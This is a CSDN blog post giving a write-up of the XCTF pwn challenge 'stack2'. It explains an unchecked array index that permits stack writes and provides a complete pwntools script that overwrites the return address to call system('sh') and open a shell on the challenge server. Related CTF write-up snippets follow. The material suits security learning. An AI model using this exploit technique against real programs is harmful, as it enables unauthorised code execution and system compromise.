xctf pwn高手进阶题之stack2

最新推荐文章于 2022-11-05 12:48:16 发布
最新推荐文章于 2022-11-05 12:48:16 发布
阅读量304 收藏
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/neuisf/article/details/104084947
版权

程序读取一个数字n,然后根据数字n读取数字到缓冲区,在执行需修改操作时为判断是否越界,而是根据用户输入的数字进行修改,造成堆栈地址内容修改。只需修改返回值即可。此题提供了hackhere函数输出flag,本地执行正常,远程出错,提示找不到/bin/bash。此处,技巧是执行system(’sh’)代替system(’/bin/sh’)。
exp:
from pwn import *
p=remote(‘111.198.29.45’,‘49796’)
print p.recvuntil(‘How many numbers you have:’)
p.sendline(“1”)
print p.recvuntil(‘Give me your numbers’)
p.sendline(‘0’)

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('0')
p.recvuntil('new number:')
p.sendline("47")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('1')
p.recvuntil('new number:')
p.sendline("98")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('2')
p.recvuntil('new number:')
p.sendline("105")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('3')
p.recvuntil('new number:')
p.sendline("110")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('4')
p.recvuntil('new number:')
p.sendline("47")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('5')
p.recvuntil('new number:')
p.sendline("115")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('6')
p.recvuntil('new number:')
p.sendline("104")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('7')
p.recvuntil('new number:')
p.sendline("0")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('132')
p.recvuntil('new number:')
p.sendline("80")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('133')
p.recvuntil('new number:')
p.sendline("132")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('134')
p.recvuntil('new number:')
p.sendline("4")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('135')
p.recvuntil('new number:')
p.sendline("8")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('140')
p.recvuntil('new number:')
p.sendline("135")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('141')
p.recvuntil('new number:')
p.sendline("137")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('142')
p.recvuntil('new number:')
p.sendline("4")
print p.recv()

p.sendline('3')
p.recvuntil('which number to change:')
p.sendline('143')
p.recvuntil('new number:')
p.sendline("8")		
print p.recv()

p.sendline('5')
p.interactive()
neuisf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 PWN 高手进阶 stack2 (write up)
qq_44768749的博客
08-18 413
攻防世界 PWN 高手进阶 stack2 (write up)stack20x01 查看保护机制0x02 查看反汇编0x03 利用过程修改返回地为system地址设置system函数的参数为'sh'exp stack2 该利用未对数组边界进行检查,从而可以实现栈溢出 0x01 查看保护机制 32位 开启NX和canary 无PIE 0x02 查看反汇编 int __cdecl main(int argc, const char **argv, const char **envp) { int
攻防世界PWN进阶区(stack2)
BurYiA的博客
01-26 873
stack2 哈,我又回来了 这个呢,基本rop,但有几个点比较难弄… 比如:偏移不好求,环境中没有/bin/bash等… 言归正传,我们先看一下基本信息 32位程序,有NX,有Canary。 运行可以发现它可以创建一个存储数字的数组,创建好以后我们可以对其中的数据进行一些基本的操作,ok,接下来开始硬刚IDA 通过观察main函数伪代码我们可以发现上图这个位置有点小问 这个时对数据进行...
XCTF-pwn-stack2 - Writeup
菜小狗.的博客
11-28 536
偶尔在学习的阶段慢慢发现的进步 抽空写点笔记记录一下子 这次做的目还是栈溢出漏洞的目但是并没用用到payload,简单用了下ROP 目描述 除了一个名称 stack2 目描述是:暂无 下载附件运行一下看看流程 保护开启了nx 和canary 流程大概是提供了4个选项的功能:加数、改数还有求平均数啥的。 然后丢到iad里看一下这部分的流程简单分析一下漏洞点。 在这里看还是蛮正常的,...
XCTF pwn stack2
weixin_44164182的博客
05-03 128
此处看v13数组的起始地址为esp-70,本程序带有canary保护,32位,则返回地址的起始地址应推算为&v13+70+4,但在该函数的返回地址前有特殊指令 此处更改了栈指针,使上述推算错误。为确定该返回地址相对于v13数组地址的偏移,应在执行retn前下断点动态调试,根据当时esp中指令确定 tip: 推算函数返回地址时应在汇编语言层面确定,执行ret前是否手动修改了esp的值 最准确的得到返回地址的方法是通过在ret前下断点动态调试,当前esp中的值为返回地址的地址 ...
pwnstack2
醉等佳人归
09-07 369
1.目 1.保护机制 开了canary和nx 2.目 简单来说就是一个计算器,支持以下功能: 2.思路 重点1:问出在第三个功能上,第三个功能是支持修改数组中的元素的,但函数没有进行index判断,导致我们通过这个偏移写任意数据到任意偏移地址,即可以覆盖函数返回地址 重点2:程序中给了一个后门函数,但是运行后发现没有/bin/bash,所以我们要自己调用system,参数的话直接使用/bin/bash中的sh即可 from pwn import * context(arch="i386",os=
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界解系列15
重新启程
12-23 1311
目地址:stack2 这是高手进阶区的第四了,速度挺快啊,朋友!加油! 废话不说,看看目先 没有什么特别的内容,那就看看保护机制 root@mypwn:/ctf/work/python/stack2# checksec fcca8ceb507544d1bd9c4a7925907a1d [*] '/ctf/work/python/stack2/fcca8ceb507544d1b...
stack2(xctf)
weixin_43868725的博客
05-26 707
0x0 程序保护和流程 保护: 流程: 当选择change number时没有对数组边界进行检查所以可以任意地址写。又在函数列表中发现一个hackhere() 0x1 利用过程 我们只需要通过数组写入这个函数的地址到main函数的返回地址处即可。简单计算一下。 v13这个数组首地址距离返回地址0x70+0x4,发现不行。然后用ida远程调试一下。输入了五个数字分别是1,2,3,4,5。offset=0xFFBDC56C-0xFFBDC4E8=0x84。 远程发现没有bash。 换成system(
[XCTF-pwn] 6-stack2
weixin_52640415的博客
03-03 100
每次允许在指写偏移写1个字节。 32没开pie且有system,bin/dash直接把 system+ret+bin/sh写到返回地址处即可 from pwn import * local = 0 if local == 1: p = process('./pwn') else: p = remote('111.200.241.244', 56810) elf = ELF('./pwn') context(arch='i386', log_level='debug') p.sen
XCTF-pwn level2 - Writeup
菜小狗.的博客
08-02 4965
XCTF-pwn-level2 WP 终于可以写这个pwn的wp咯~ 很开心,说明我又有一些收获来解决了一些问 目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ 先将elf文件下载丢到乌班图里查看一下文件类型,通过checksec查看一下保护情况最后在运行一下瞅瞅到底运行起来是杂肥似。 可以看到NX这项保护是开启的状态,这意味着:栈中数据没有执行...
攻防世界pwn-stack2学习记录
Hotspurs的博客
11-18 1339
pwn新手一枚,做这时苦苦没找出来解上说的0x84偏移,经过多次尝试,终于找到了正确的方式,遂以记录。 首先分析漏洞点: 当选择3.change number时,程序没有对输入的v5进行检测,遂可以产生溢出 之后看到程序给了getflag 开启动态调试,此时在v13[v5] = v7;处下断点。 如图所示输入 转到汇编指令,查看这个地址(edx存的就是输入9,看看他把9...
xctf-pwn-“stack2 & pwn1 & welpwn
njh18790816639的博客
07-30 181
stack2 首先探测一番,是32位,看下保护! ida静态分析一番! 还有个后门函数: 原先先要使用这个后门函数,但是发现远程服务器是没有bash的,所以这个后门函数是没有用的,误导我等! 不过还是先按正常思路来说,这第三个函数是没有检查数据的合法性的。 ...
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3406
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
stack2
约定的博客
01-14 124
85 Maximal Rectangle 问:找到矩形内连续的都是1,这个矩形的面积。首先考虑到的是暴力搜索,不断枚举起始节点的x,y坐标,节点节点的x,y坐标。计算矩形面积的几个方法:1 一个一个元素遍历;2 利用矩阵长*宽;3 利用上一步计算的矩形的值。这个需要4层循环,慢。 学习:讨论里面有一种动态规划的解法。虽然看了,也知道怎么回事,但是还想不明白作者是如何相出这种DP想法的。我应该
9.pwn入门新手练习攻防世界stack2 低位读取内存
qiudalaojiao的博客
02-22 1397
参考文章 https://blog.csdn.net/qq_43681242/article/details/104077461 exp #!/usr/bin/env python #coding:utf-8 from pwn import * #p = process('./stack2') p = remote('111.198.29.45',58596) system_addr = 0x...
攻防世界pwn难度1
weixin_63282980的博客
11-05 1616
攻防世界难度1的目WP
攻防世界pwn新手答案
最新发布
08-10
- *1* *2* [xctf攻防世界pwn基础解(新手食用)](https://blog.csdn.net/lplp9822/article/details/89735167)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值